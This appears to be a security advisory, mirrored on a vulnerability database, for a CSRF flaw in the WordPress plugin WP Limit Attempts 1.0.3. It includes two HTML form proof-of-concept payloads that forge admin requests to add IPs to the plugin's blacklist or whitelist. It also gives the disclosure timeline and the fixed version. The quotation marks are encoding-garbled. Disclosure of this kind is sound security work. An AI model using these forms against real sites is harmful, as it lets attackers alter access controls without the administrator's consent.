`Plugin Name : WP Limit Attempts A8-Cross-Site_Request_Forgery_(CSRF)
Effected Version : 1.0.3 (and most probably lower version's if any)
Vulnerability : A8-Cross-Site Request Forgery (CSRF)
Identified by : Madhu Akula
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
POC for Blcklist :
<html>
<body>
<form action=âhttp://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=blacklistâ method=âPOSTâ>
<input type=âhiddenâ name=âlmtttmpts_add_to_blacklistâ value=â192.168.1.1âł />
<input type=âsubmitâ value=âSubmit requestâ />
</form>
</body>
</html>
POC for whitelist:
<html>
<body>
<form action=âhttp://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=whitelistâ method=âPOSTâ>
<input type=âhiddenâ name=âlmtttmpts_add_to_whitelistâ value=â192.168.1.1âł />
<input type=âsubmitâ value=âSubmit requestâ />
</form>
</body>
</html>
In the value place change the IP which you want to block (or) allow
Vulnerable Parameter : Vulnerable_parameter
Fixed in : 1.0.4
http://wordpress.org/plugins/limit-attempts/changelog/
Disclosure Timeline
Vendor Contacted : 2014-08-04
Plugin Status : Updated on 2014-08-07
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet
Plugin Description :
Limit Attempts is a plugin developed by BestWebSoft, which was designed to manage the access to user's website. With this plugin, you can limit user's attempts to log in to your website and, consequently, block the user for a certain period of time. Apart from that, Limit Attempts allows users to create and edit black- and whitelists with the aim of controlling the access to the site and its content. Also, with this plugin, users will be able to specify the settings for adding an address to the blacklist, as well as be aware of everything that is going on your website by sending email notifications about blocking. Moreover, this plugin is compatible with htaccess, thus, you can minimize server workload by adding IP address blocking data to htaccess file.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation